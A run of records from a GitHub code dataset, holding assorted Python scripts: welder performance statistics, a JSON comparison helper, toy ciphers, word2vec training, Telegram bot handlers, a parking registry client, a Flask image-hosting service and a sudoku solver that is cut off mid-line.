fitter_data, drop_job_weights=True)\n # welder_data = convert_weight_to_earned_hours(state, welder_data, drop_job_weights=True)\n \n \n \n \n # if it is the first state in the list, create a dataframe from the current dataframes\n if state == states[0]:\n all_fitters = fitter_data.copy().reset_index(drop=True)\n all_welders = welder_data.copy().reset_index(drop=True)\n # if it is not the first state, jsut append the data to the company wide dataframe\n else:\n all_fitters = all_fitters.append(fitter_data, ignore_index=True)\n all_welders = all_welders.append(welder_data, ignore_index=True)\n \n \n \n# where to put the csv files\ndirectory = 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//'\n# create a timestamp so as not to override files\nfile_timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n# the time span of when the file was created for\nfile_range = start_date.replace('/','-') + '_to_' + end_date.replace('/','-')\n# the end of the file name is the file range and creation timestamp \nfile_name_end = '_' + file_range + '_' + file_timestamp + '.csv'\n# convert the fitter_data df to a csv\n# fitter_data.to_csv(file_name_start + 'fitters' + file_name_end)\n# # convert the welder_data df to a csv\n# welder_data.to_csv(file_name_start + 'welders' + file_name_end)\n\n\n\nall_fitters_grouped = get_employee_hours(all_fitters, direct, indirect)\nall_fitters_grouped = all_fitters_grouped.round(3)\nall_welders_grouped = get_employee_hours(all_welders, direct, indirect)\nall_welders_grouped = all_welders_grouped.round(3)\n\n# combine\nall_both = all_fitters_grouped.append(all_welders_grouped)\nall_both = all_both.sort_values(by=['Classification','Weight'], ascending=False)\nall_both.to_csv(directory + 'all_both' + file_name_end)\n\n\n# after completing the loop, convert all_fitters to a csv\nall_fitters_grouped.to_csv(directory + 'all_fitters' + file_name_end)\n# after completing the loop, convert all_welders to a csv\nall_welders_grouped.to_csv(directory + 'all_welders' + file_name_end)\n\nprint(directory + 'all_both' + file_name_end)\n\n\n\n# all_both_csvs = ['c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_12-01-2022_to_12-31-2022_2023-01-10-18-15-56.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_11-01-2022_to_11-30-2022_2023-01-11-10-52-01.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_10-01-2022_to_10-31-2022_2023-01-12-10-46-09.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_09-01-2022_to_09-30-2022_2022-10-14-12-01-38.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_08-01-2022_to_08-31-2022_2022-10-14-08-17-24.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_07-01-2022_to_07-31-2022_2022-10-13-18-05-02.csv']\n\n# combine_multiple_all_both_csv_files_into_one_big_one(all_both_csvs, 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_6month_July012022_December312022.csv')\n\n","repo_name":"cwilsonCrystalSteel/Python","sub_path":"Fitter_Welder_Stats.py","file_name":"Fitter_Welder_Stats.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31033793334","text":"# It's not clear whether the function should return bool or comparison diff.\n# Assume, that we have mypy and input params have correct format\n# The order in lists matters\nimport math\nfrom typing import Any\n\nFLOAT_COMPARISON_PRECISION = 0.00001\n\n\ndef compare(item1: Any, item2: Any) -> bool:\n if type(item1) != type(item2):\n return False\n if isinstance(item1, dict):\n return is_jsons_equal(item1, item2)\n if isinstance(item1, float):\n return math.isclose(item1, item2, abs_tol=FLOAT_COMPARISON_PRECISION)\n return item1 == item2\n\n\ndef is_jsons_equal(first_json: dict, second_json: dict) -> bool:\n if not first_json and not second_json:\n return True\n if first_json.keys() != second_json.keys():\n return False\n for key, val in first_json.items():\n if not compare(val, second_json[key]):\n return False\n return True\n","repo_name":"wkomor/VL_test","sub_path":"jsons_equality.py","file_name":"jsons_equality.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5162457404","text":"def list_manipulation(lst,command,loc,value=None):\n if command == \"remove\" and value == None:\n if loc == \"end\":\n return lst.pop()\n return lst.pop(0)\n if command == \"add\":\n if loc == \"beginning\":\n \tlst.insert(0,value)\n \treturn lst\n else:\n \tlst.append(value)\n \treturn lst\n\nprint(list_manipulation([1,2,3,4],\"add\",\"end\",47))","repo_name":"ksompura/python_training","sub_path":"function_excersises/list_manipulation.py","file_name":"list_manipulation.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5124208291","text":"hlam = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\nhohol = {hlam[i].upper(): i for i in range(len(hlam))}\nhohol_back = {i: hlam[i].upper() for i in range(len(hlam))}\n\n\ndef cezar_ukr(string, p, m):\n res = \"\"\n for i in range(len(string)):\n l = (hohol[string[i].upper()] * p + m) % 26\n res += hohol_back[l]\n return res\n\n\ndef vigenere_encrypt_ukr(plaintext, key):\n key_length = len(key)\n key_as_int = [hohol[i] for i in key]\n plaintext_int = [hohol[i] for i in plaintext]\n print(key_as_int, plaintext_int)\n ciphertext = ''\n for i in range(len(plaintext_int)):\n value = (plaintext_int[i] + key_as_int[i % key_length]) % 26\n ciphertext += hohol_back[value]\n return ciphertext\n\n\ndef vigenere_decrypt_ukr(ciphertext, key):\n key_length = len(key)\n key_as_int = [hohol[i] for i in key]\n ciphertext_int = [hohol[i] for i in ciphertext]\n print(key_as_int, ciphertext_int)\n plaintext = ''\n for i in range(len(ciphertext_int)):\n value = (ciphertext_int[i] - key_as_int[i % key_length]) % 33\n plaintext += hohol_back[value]\n return plaintext\n\n\nprint(vigenere_encrypt_ukr(\"haveaniceweek\".upper(), \"online\".upper()))\n","repo_name":"maxymkuz/cs_2","sub_path":"off_class_stuff/discrete/cyphers.py","file_name":"cyphers.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8525379826","text":"import pandas as pd\nimport re, os, csv, time\nimport nltk.data\nimport logging\n#from gensim import models\nfrom gensim.models import word2vec\nfrom bs4 import BeautifulSoup\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nWordNetLemmatizer = WordNetLemmatizer()\n\n# from nltk import word_tokenize, sent_tokenize\n# nltk.download()\ntokenizer = nltk.data.load('nltk:tokenizers/punkt/english.pickle')\n#Script que genera el modelo de word2Vec\n\n\n\n# AUXILIAR FUNCTIONS #\n# Determines whether a tag belongs to a verb\ndef isVerbTag(tag):\n return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']\n\n# Does the lemmatizing of a specific pos recognition (word, tag)\n# NOTA: Tenemos que hacer un postagging previo, ya que necesitamos \"ayudar\" al lemmatizer\n# y decirle aquellas palabras que son verbos\ndef lemmatizeWord(posTag):\n word = posTag[0]\n tag = posTag[1]\n # print \"word: \", word, \" tag: \", tag\n if isVerbTag(tag):\n #print word,\" ES UN VERBO --- lemmatize: \", WordNetLemmatizer.lemmatize(word,pos='v')\n return WordNetLemmatizer.lemmatize(word,pos='v')\n else:\n #print word,\" ES OTRA PALABRA\"\n return WordNetLemmatizer.lemmatize(word)\n\n\n# Si no se especifica que limpie el texto, simplemente spliteamos el texto\ndef news_to_wordlist(news, remove_stopwords=False,clean_text=True):\n # This time we won't remove the stopwords and numbers\n if clean_text:\n # 0. Remove HTML tags\n body = BeautifulSoup(news,\"html.parser\").get_text() \n # 1. Change all numbers by \"NUM\" tag and remove all puntuation symbols by a single space\n body = re.sub(\"[0-9]+\", \"NUM\", news)\n body = re.sub(\"[^a-zA-Z]\", \" \", body)\n \n # 2. Convert to lower case all characters in body\n body = body.lower()\n \n # 3. TODO: Remove javascript code & URLS\n body = re.sub('https?:\\/\\/.*[\\r\\n]*', \" \", body)\n else:\n body = news\n\n\n # 4. Tokenize body\n bodyWords = body.split()\n \n # 5. Remove stop-words from body\n if remove_stopwords and clean_text:\n stopSet = set(stopwords.words(\"english\"))\n bodyWords = [word for word in bodyWords if not word in stopSet]\n \n if clean_text:\n # # 6. POS tagging and Lemmatize body\n posTagging = nltk.pos_tag(bodyWords)\n bodyWords = list(map(WordNetLemmatizer.lemmatize,bodyWords))\n bodyLemmatized = []\n for taggedWord in posTagging:\n bodyLemmatized.append(lemmatizeWord(taggedWord))\n bodyWords = bodyLemmatized\n\n #Returns a list of words\n return(bodyWords)\n\n\n#Function to split a news piece int parsed sentences. Returns a \n# list of sentences, where each sentence is a list of words\ndef news_to_sentences(news, tokenizer=tokenizer, remove_stopwords=False, use_tokenizer=True,max_sentence_size=150):\n if use_tokenizer:\n # 1. Use the NLTK tokenizer to split the paragraph into sentences\n raw_sentences = tokenizer.tokenize(news.strip())\n else:\n #raw_sentences = re.split( \"\\.\", news ) # Es mas lento que el metodo nativo de str\n raw_sentences = news.split('.')\n if len(raw_sentences) > max_sentence_size:\n raw_sentences = raw_sentences[:max_sentence_size]\n\n #Loop over each sentence\n sentences = []\n for raw_sentence in raw_sentences:\n # If a sentence is empty, skip it\n if len(raw_sentence) > 0:\n # Otherwise, call news_to_wordlist to get a list of words\n sentences.append(news_to_wordlist(raw_sentence,remove_stopwords))\n\n #Return the list of sentences (each sentence is a list of words)\n # So this returns a list of lists\n return sentences\n\ndef trainWord2Vec(sentences,archiveTag):\n logging.basicConfig(format='%s(asctime)s: %(levelname)s : %(message)s', level=logging.INFO)\n\n # Set values for various parameters\n num_features = 300 # Word vector dimensionality\n min_word_count = 15 # Minimum word count\n num_workers = 4 # Number of threads to run in parallel\n context = 35 # Context window size\n downsampling = 1e-3 #Downsample setting for frequent words \n\n # Initialize and train the model (this will take some time)\n model = word2vec.Word2Vec(sentences, workers=num_workers, size=num_features, min_count=min_word_count, \\\n window = context, sample=downsampling)\n\n # If you don't plan to train the model any further, calling init_sims \n # will make the model much more memory-efficient\n model.init_sims(replace=True)\n\n # It can be helpful to create a meaningful model name and\n # save the model for later use. You can load it later using Word2Vec.load()\n model_name = str(num_features) + \"features_\" + str(min_word_count) + \"minwords_\" + str(context) + \"context\" + archiveTag\n model.save(model_name)\n #models.Word2Vec.save_word2vec_format(model_name)\n return model_name\n\n# def makeWord2VecModel(trainStance):\ndef makeWord2VecModel():\n basePath = \"./fnc-1-original/\"\n outputDir = basePath + \"cleanDatasets/\"\n # if trainStance:\n # inputFilePath = basePath + \"train_stances.csv\" \n # fileTag = \"STANCES\"\n # else:\n # inputFilePath = basePath + \"train_bodies.csv\" \n # fileTag = \"BODIES\"\n \n # stancesFilePath = basePath + \"train_stances.csv\"\n # bodiesFilePath = basePath + \"train_bodies.csv\"\n\n fileTag = \"ALL\"\n\n # textTag = 'articleBody' if trainStance==False else 'Headline'\n # # Leemos los ficheros etiquetados y sin etiquetar\n # bodiesTrainFile = pd.read_csv(bodiesFilePath,header=0,delimiter=\",\", quoting=1)\n # stancesTrainFile = pd.read_csv(stancesFilePath,header=0,delimiter=\",\", quoting=1)\n # print(\">>> Read file \", bodiesFilePath , \"shape:\", bodiesTrainFile.shape)\n # print(\">>> Read file \", stancesFilePath , \"shape:\", stancesTrainFile.shape)\n \n aggregated_train_path = \"./fnc-1-original/finalDatasets/train_partition.csv\"\n aggregated_train_file = pd.read_csv(aggregated_train_path,header=0,delimiter=\",\", quoting=1)\n print(\">>> Read file \", aggregated_train_path , \"shape:\", aggregated_train_file.shape)\n\n # Si tuvieramos datos sin etiquetar podriamos utilizarlos igualmente en el entrenamiento\n # ya que word2vec no requiere de datos etiquetados\n # inputUnlabeledFile = basePath + \"test_stances_unlabeled.csv\"\n # unlabeled_train = pd.read_csv(inputUnlabeledFile, header=0,delimiter=\",\", quoting=1)\n # print(\">>> Read file \", inputUnlabeledFile , \"shape:\", unlabeled_train.shape)\n\n # Word2Vec se espera un formato de lista de listas (lista de frases, cada frase una lista de palabras),\n # asi que procesamos el texto para que tenga ese formato \n # Utilizaremos el punkTokenizer de nltk\n\n #Download the puntk tokenizer for sentence splitting\n #nltk.download('puntk')\n\n # Load the puntk tokenizer\n #tokenizer = nltk.data.load('tokenizer/punkt/english.pickle')\n\n sentences = []\n print(\"> Parsing sentences from training set\")\n\n # Recorremos el fichero de titulares y cuerpos de noticias para crear el modelo\n # for index,line in bodiesTrainFile.iterrows():\n # sentences += news_to_sentences(line['articleBody'], tokenizer)\n \n # for index,line in stancesTrainFile.iterrows():\n # sentences += news_to_sentences(line['Headline'], tokenizer)\n \n start = time.time()\n for index,line in aggregated_train_file.iterrows():\n sentences += news_to_sentences(line['ArticleBody'], tokenizer)\n sentences += news_to_sentences(line['Headline'], tokenizer)\n end = time.time()\n formatTime = end - start\n\n # Check how many sentences we have in total\n print(\"> #Sentences: \", len(sentences))\n # print (\"> First Sentence : \", sentences[0])\n # print (\"> Second Sentence : \", sentences[1])\n \n start = time.time()\n model_name = trainWord2Vec(sentences, fileTag)\n end = time.time()\n trainTime = end - start\n\n # Export data to a csv file\n csvOutputDir = \"./executionStats/\"\n date = time.strftime(\"%Y-%m-%d\")\n output_file = csvOutputDir + \"word2vec_execution_\" + date + \".csv\"\n fieldNames = [\"date\", \"modelName\", \"formatTime\", \"trainTime\"]\n \n with open(output_file, 'a') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldNames)\n executionData = {\n \"date\": time.strftime(\"%Y-%m-%d %H:%M\"),\n \"modelName\": model_name,\n \"formatTime\": formatTime,\n \"trainTime\": trainTime\n }\n \n newFile = os.stat(output_file).st_size == 0\n if newFile:\n writer.writeheader()\n writer.writerow(executionData)\n\n print(\">> Stats exported to: \", output_file)\n\n\nif __name__ == \"__main__\":\n # makeWord2VecModel(False) # Para entrenar el fichero con los cuerpos de noticias\n makeWord2VecModel()\n","repo_name":"ailopera/tensor_project","sub_path":"data/word2VecModel.py","file_name":"word2VecModel.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34873518082","text":"from telegram import (\n\tReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove, \n\tInlineKeyboardMarkup, InlineKeyboardButton\n\t)\nfrom telegram.ext import ConversationHandler\n\nimport logging\nimport sqlalchemy\n\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(__file__) + \"/../parserfrilanse/\")\n\nfrom setup_db.create_db import create_db\nfrom bot.message_texts import (\n\tKEYBOARD_BUTTON, INLINE_BUTTON, ECHO, START, GREET_USER, VERIFIED, \n\tPAY_MESSAGE, CORRECTOR, CORRECTOR_NONE\n\t)\nfrom db_connections.connections import DataBaseSelector\nfrom utils import get_cards\n\ndef query_to_base_start(bot, update, user_data):\n\tlogging.info('in def query_to_base_start')\n\tupdate.message.reply_text(\n\t\tGREET_USER, reply_markup = ReplyKeyboardRemove()\n\t\t)\n\treturn 'skill'\n\ndef last_skill(bot, update):\n\tprint(\"last_skill\")\n\ttry:\n\t\tuser_questions = open('user_questions.txt').read()\n\t\tuser_questions = user_questions.split(\":\")\n\t\tchat_id = user_questions[0]\n\t\tquestions = user_questions[1].strip().replace(\"'\",\"\")\n\n\t\tif chat_id == str(update.message.chat.id):\n\t\t\tselector = DataBaseSelector(questions)\n\t\t\tlink = selector.query_to_base_skill()\n\t\t\tcards = get_cards(link)\n\t\t\tfor card in cards:\n\t\t\t\tif card['verified'] == True:\n\t\t\t\t\tpay_metod = VERIFIED\n\t\t\t\telse: \n\t\t\t\t\tpay_metod = ''\n\t\t\t\turl = card['link']\n\t\t\t\tupdate.message.reply_text(PAY_MESSAGE.format(\n\t\t\t\t\ttitle = card['title'], \n\t\t\t\t\ttime = card['time'],\n\t\t\t\t\tdescription = card['description'], \n\t\t\t\t\tlist_skill = card['list_skill'], \n\t\t\t\t\tprice = card['price'], \n\t\t\t\t\tpay_metod = pay_metod, \n\t\t\t\t\tbids = card['bids']),\n\t\t\t\t\treply_markup= card_link_kb(url)\n\t\t\t\t\t)\n\texcept FileNotFoundError:\n\t\tpass\n\n\ndef query_to_base_get_skill(bot, update, user_data):\n\t\"\"\"Прогоняем запрос пользователя по базе, запускает парсер и выводит ответы в телеграмм\"\"\"\n\tlogging.info('in def query_to_base_get_skill')\n\tuser_skill = update.message.text\n\tnone_tip = []\n\ttry:\n\t\tselector = DataBaseSelector(user_skill)\n\t\tlink = selector.query_to_base_skill()\n\n\texcept AttributeError:\n\t\tlogging.info('AttributeError')\n\t\tcorrector = DataBaseSelector(user_skill)\n\t\tuser_tip = corrector.find_in_key_words()\n\t\tlogging.info(user_tip)\n\t\tif user_tip == '[]':\n\t\t\tmessage = CORRECTOR_NONE\n\t\telse:\n\t\t\tmessage = CORRECTOR.format(user_tip)\n\t\tupdate.message.reply_text(message, reply_markup= get_keyboard())\n\t\treturn 'skill'\n\t\n\t\n\t#Пускаем парсер по ссылке\n\tcards = get_cards(link)\n\tfor card in cards:\n\t\tif card['verified'] == True:\n\t\t\tpay_metod = VERIFIED\n\t\telse: \n\t\t\tpay_metod = ''\n\t\turl = card['link']\n\t\tupdate.message.reply_text(PAY_MESSAGE.format(\n\t\t\ttitle = card['title'], \n\t\t\ttime = card['time'],\n\t\t\tdescription = card['description'], \n\t\t\tlist_skill = card['list_skill'], \n\t\t\tprice = card['price'], \n\t\t\tpay_metod = pay_metod, \n\t\t\tbids = card['bids']),\n\t\t\treply_markup= card_link_kb(url)\n\t\t\t)\n\t###записываем пользователя и запрос\n\tchat_id = update.message.chat.id\n\tchat_text = update.message.text\n\tuser =\"{}:{}\".format(chat_id, chat_text)\n\twith open('user_questions.txt','w',encoding = 'utf-8') as f:\n\t\tf.write(user)\n\treturn ConversationHandler.END\n\n\ndef get_keyboard():\n\tmy_keyboard = ReplyKeyboardMarkup(\n\t\t[[KEYBOARD_BUTTON],['last_skill']], \n\t\tresize_keyboard = True\n\t\t)\n\treturn my_keyboard\n\n\ndef card_link_kb(url):\n button0 = InlineKeyboardButton(text=INLINE_BUTTON, url=url)\n buttons_list = [[button0]]\n keyboard = InlineKeyboardMarkup(buttons_list)\n return keyboard \n\n\ndef greet_user(bot,update,user_data):\n\ttext = START.format((update.message.chat.first_name))\n\tupdate.message.reply_text(text, reply_markup= get_keyboard())\n\n\ndef talk_to_me(bot, update, user_data):\n\tlogging.info('talk_to_me вход')\n\t#принимаем текст от пользователя\n\tuser_text = ECHO.format(\n\t\t(update.message.chat.first_name), update.message.text)\n\n\tlogging.info(\"User: %s, Chat id: %s, Message: %s\", update.message.chat.username, \n\t\t\tupdate.message.chat.id, update.message.text)\n\n","repo_name":"DipProject-org/ParserFreelanser2","sub_path":"bot/talk_with_user.py","file_name":"talk_with_user.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74086933811","text":"from .apiRoutes import CONFIG,REGISTRYS\nfrom .api import get,post\nimport json\nfrom parking_configuration.Registry import Registry\nimport threading\n\ndef post_registrys_async(registrys,token,session):\n try:\n threading.Thread(target=postRegistrys, args=(registrys,token,session)).start()\n except Exception as e: print(e)\n\ndef postRegistrys(registrys,token,session):\n\tformattedRegistrys = []\n\t\n\tfor registry in registrys:\n\t\tformattedRegistrys.append(\n\t\t\t{\n\t\t\t\t\"fecha\": registry.fecha,\n\t\t\t\t\"idParking\": registry.idParking,\n\t\t\t\t\"patente\": registry.patente,\n\t\t\t\t\"tipo\": registry.tipo,\n\t\t\t\t\"cameraId\": registry.cameraId\n\t\t\t}\t\n\t\t)\n\n\tdata = {\n\t\t\"registrys\": formattedRegistrys\n\t}\n\n\treturn post(REGISTRYS,data,token,session)\n\ndef getRegistrys(token):\n\tresponse = get(REGISTRYS,token)\n\tresponse = json.loads(response.content)\n\tregistrys = []\n\tfor registry in response:\n\t\tregistry_new = Registry(registry['id'],registry['fecha'],registry['idParking'],registry['patente'],registry['tipo'],registry['cameraId'])\n\t\tregistry_new.id = registry['id']\n\t\tregistrys.append(registry_new)\n\treturn registrys\n","repo_name":"luke92/crv-smart-parking-system","sub_path":"parking-detection/services/registrys.py","file_name":"registrys.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23299677412","text":"import io\nimport TS\nimport time\nimport uuid\nimport json\nimport flask\nimport base64\nimport imghdr\nimport yagmail\nimport datetime\nimport requests\nimport threading\nimport firebase_admin\nfrom flask_cors import CORS\nfrom firebase_admin import db\nfrom flask import request, render_template, url_for\nfirebase_admin.initialize_app(firebase_admin.credentials.Certificate(\"./auth.json\"), {\"databaseURL\": \"https://tensorshareio-default-rtdb.firebaseio.com/\"})\napp = flask.Flask(__name__)\nmac = yagmail.SMTP(user=TS.email.auth.mail, password=TS.email.auth.pwd)\nCORS(app, resources={\"/*\": {\"origins\": \"*\"}})\ndbref = db.reference().get()\ndef get_tokens():\n return db.reference(\"/tokens\").get()\n\n@app.route(\"/waitlist\", methods=[\"GET\"])\ndef waitlist():\n return render_template(\"waitlist.html\", endpoint=TS.sys.endpoint)\n\n@app.route(\"/waitlist/add_user\", methods=[\"PUT\"])\ndef waitlist_add_user(): # sourcery skip: remove-unnecessary-else, simplify-fstring-formatting, swap-if-else-branches\n if TS.email.getFormated(request.args.get(\"email\")) in db.reference(\"/waitlist/emails\").get():\n return json.dumps({\"error\": \"Email already in waitlist\", \"code\": 32})\n email = request.args.get(\"email\")\n femail = TS.email.getFormated(email)\n name = request.args.get(\"name\")\n utk = str(uuid.uuid4()).replace(\"-\", \".\")\n html = f\"\"\"\n \"Thank\n

    Hello, {name}, you've been added to the waitlist.

    \n

    We sent you this email as a confirmation for your subscription to the TensorShare waitlist!

    \n

    If you did not wish to be added to the waitlist, you may click here to unsubscribe

    \n \"\"\"\n mac.send(to=email, subject=f\"Hello, {name}, you've been added to the waitlist.\", contents=[html])\n db.reference(f\"/waitlist/emails/{femail}\").set({\n \"confirmed\": \"true\",\n \"utk\": utk,\n \"email\": email,\n \"name\": name\n })\n return json.dumps({\"success\": True})\n\n@app.route(\"/waitlist/remove_user\", methods=[\"DELETE\"])\ndef waitlist_remove_user():\n if TS.email.getFormated(request.args.get(\"email\")) in db.reference(\"/waitlist/emails\").get():\n if db.reference(\"/waitlist/emails/\"+TS.email.getFormated(request.args.get(\"email\"))).get()[\"utk\"] == request.args.get(\"utk\"):\n data = db.reference(\"/waitlist/emails/\"+TS.email.getFormated(request.args.get(\"email\"))).get()\n db.reference(\"/waitlist/emails/\"+TS.email.getFormated(request.args.get(\"email\"))).delete()\n return json.dumps({\"success\": True, \"name\": data[\"name\"], \"email\": data[\"email\"]})\n return json.dumps({\"error\": \"UTK doesn't match\", \"success\": False, \"code\": 403})\n return json.dumps({\"error\": \"Email not in database\", \"success\": False, \"code\": 404})\n\n@app.route(\"/waitlist/unsubscribe/\", methods=[\"GET\"])\ndef waitlist_unsubscribe():\n email = request.args.get(\"email\")\n femail = TS.email.getFormated(email)\n if TS.email.getFormated(email) in db.reference(\"/waitlist/emails\").get():\n data = db.reference(f\"/waitlist/emails/{femail}\").get()\n return flask.render_template(\"unsubscribe.html\", name=data[\"name\"].split(\" \")[0])\n return flask.redirect(\"/waitlist\")\n\n@app.route(\"/waitlist/thanks\", methods=[\"GET\"])\ndef waitlist_thanks():\n email = request.args.get(\"email\")\n emailProvider = email.split(\"@\")[-1]\n return render_template(\"thanks.html\", name=request.args.get(\"name\", db.reference(\"/waitlist/emails/\"+TS.email.getFormated(email)).get()[\"name\"]) , email=email, emailProvider=f\"https://{emailProvider}\")\n\n@app.route(\"/waitlist/sorry\")\ndef waitlist_sorry():\n email = request.args.get(\"email\")\n return render_template(\"sorry.html\", email=email, name=request.args.get(\"name\", \"Unknown user\"))\n\n@app.route(\"/waitlist/thanks/image\", methods=[\"GET\"])\ndef waitlist_thanks_image():\n return flask.send_file(\"./static/images/thanks.png\")\n\n@app.route(\"/post/image/\", methods=[\"GET\", \"POST\"])\ndef post_image(): # sourcery skip: simplify-fstring-formatting\n if request.args.get(\"token\") not in get_tokens().keys():\n return json.dumps({\"error\": \"Unauthorized\"})\n\n if request.data and \";base64,\" not in str(request.data) and \";base64,\" not in request.args.get(\"data\", \"\"):\n data = request.data\n elif not request.data and \";base64,\" in request.args.get(\"data\"):\n try:\n data = base64.b64decode(request.args.get(\"data\", \"\").split(\";base64,\")[-1].replace(\" \", \"+\"))\n except:\n return json.dumps({\"error\": \"Couldn't decode base64 string\"})\n elif \";base64,\" in str(request.data):\n try:\n data = base64.b64decode(str(request.data).split(\";base64,\", \"\")[-1].replace(\" \", \"+\"))\n except:\n return json.dumps({\"error\": \"Couldn't decode base64 string\"})\n elif request.args.get(\"url\", None):\n data = requests.get(request.args.get(\"url\")).content\n else:\n data = None\n\n if io.BytesIO(data).getbuffer().nbytes > TS.sys.maxSize and request.args.get(\"token\") != db.reference(\"/tokens/master\").get():\n return json.dumps({\"error\": \"Data exceeds size limit.\"})\n\n uid = TS.new.image_id()\n fmt = imghdr.what(None, data)\n \n if fmt:\n if request.args.get(\"by\") not in {\"anon\", \"anonymous\"} and request.args.get(\"anon\") != \"true\":\n ub = (\n request.args.get(\"by\")\n or get_tokens()[request.args.get(\"token\")][\"belongsTo\"]\n )\n else:\n ub = \"an Anonymous user\"\n\n if data:\n finalData = TS.image.getData(data, get_tokens()[request.args.get(\"token\")][\"id\"], ub, uid)\n else:\n return json.dumps({\"error\": \"Invalid data URL or body (data URL must be in base64 or body must be in binary).\"})\n db.reference(f\"/images/{uid}\").set(finalData)\n db.reference(\"/tokens/\"+request.args.get(\"token\")+\"/uploads\").update({len(db.reference(\"/tokens/\"+request.args.get(\"token\")+\"/uploads\").get()): uid})\n return json.dumps({\"success\": True, \"url\": f\"{TS.sys.endpoint}/{uid}.{fmt}\"})\n\n else:\n return json.dumps({\"error\": \"Media type not supported\"})\n\n@app.route(\"//\", methods=[\"GET\"])\ndef view(img: str): # sourcery skip: collection-builtin-to-comprehension, remove-redundant-if, remove-unnecessary-else, swap-if-else-branches\n image = img.split(\".\")[0]\n got = db.reference(f\"/images/{image}\").get()\n \n if got:\n if TS.request.is_from_browser(request.user_agent):\n if \"b64\" not in got:\n b64im = str(base64.b64encode(got[\"data\"].encode(TS.config.encoding.fmt)))[2:-1]\n else:\n b64im = got[\"b64\"]\n return render_template(\n \"main.html\",\n name=image,\n nameU=image.upper(),\n data=b64im,\n fmt=got[\"fmt\"],\n fmtU=got[\"fmt\"].upper(),\n uploadedBy=got[\"uploadedBy\"][\"name\"],\n iat=str(datetime.datetime.now()) if \"iat\" not in got else got[\"iat\"],\n size=\"0\" if \"size\" not in got else got[\"size\"],\n colData=\"0,0,0;0,0,0;0,0,0;0,0,0;:0,0,0\" if \"colData\" not in got else got[\"colData\"],\n dimen=\"0,0\" if \"dimen\" not in got else got[\"dimen\"],\n exif=\"{}\" if \"exif\" not in got else got[\"exif\"],\n endpoint=TS.sys.endpoint\n )\n else:\n return flask.send_file(io.BytesIO(got[\"data\"].encode(TS.config.encoding.fmt)), mimetype=\"image/\"+str(got[\"fmt\"]))\n else:\n return flask.send_file(\"./static/images/404.png\")\n\n@app.route(\"//file/\", methods=[\"GET\"])\ndef img_file(img: str):\n image = img.split(\".\")[0]\n got = db.reference(f\"/images/{image}\").get()\n if got:\n return flask.send_file(io.BytesIO(got[\"data\"].encode(TS.config.encoding.fmt)), mimetype=\"image/\"+str(got[\"fmt\"]))\n else:\n return flask.send_file(\"./static/images/404.png\")\n\n@app.route(\"//data/\", methods=[\"GET\"])\ndef img_data(img: str):\n image = img.split(\".\")[0]\n got = db.reference(f\"/images/{image}\").get()\n dat = request.args.get(\"data\").lower()\n if dat == \"b64\" or dat == \"base64\":\n got[\"data\"] = None\n elif dat == \"bin\" or dat == \"binary\" or dat == \"unicode\" or dat == TS.config.encoding.fmt:\n got[\"base64\"] = None\n return got if got and \"b64\" in got else json.dumps({\"data\": None, \"fmt\": None, \"uploadedBy\": {\"name\": None, \"id\": 0000000000000000}, \"iat\": str(datetime.datetime.now()), \"size\": 0, \"b64\": None, \"colData\": \"0,0,0;0,0,0;0,0,0;0,0,0;:0,0,0\", \"dimen\": \"0,0\", \"exif\": {}})\n\n@app.route(\"/404\", methods=[\"GET\"])\ndef _404():\n return flask.send_file(\"./static/images/404.png\")\n\n@app.route(\"/favicon.ico/\", methods=[\"GET\"])\ndef icon():\n return flask.send_file(\"favicon.ico\")\n\ndef getDBRefLoop():\n global dbref\n while True:\n time.sleep(60*5)\n dbref = db.reference().get()\n\nif __name__ == '__main__':\n threading.Thread(target=getDBRefLoop, daemon=True).start()\n app.run()\n","repo_name":"ramondeleonca/TensorShare","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2142671388","text":"import time\n\nclass backtraking:\n\n def __init__(self, sudoku):\n self.tamano = len(sudoku)\n self.sudoku = sudoku\n\n def is_valid(self, row, col, num): #Verifica si es valido el cambio\n for i in range(self.tamano):\n if self.sudoku[row][i] == num or self.sudoku[i][col] == num:\n return False\n start_row, start_col = 3 * (row // 3), 3 * (col // 3)\n for i in range(3):\n for j in range(3):\n if self.sudoku[i + start_row][j + start_col] == num:\n return False\n return True\n\n def solve(self):\n empty = self.find_empty()\n if not empty:\n return True # Tablero resuelto\n\n row, col = empty\n\n for num in range(1, 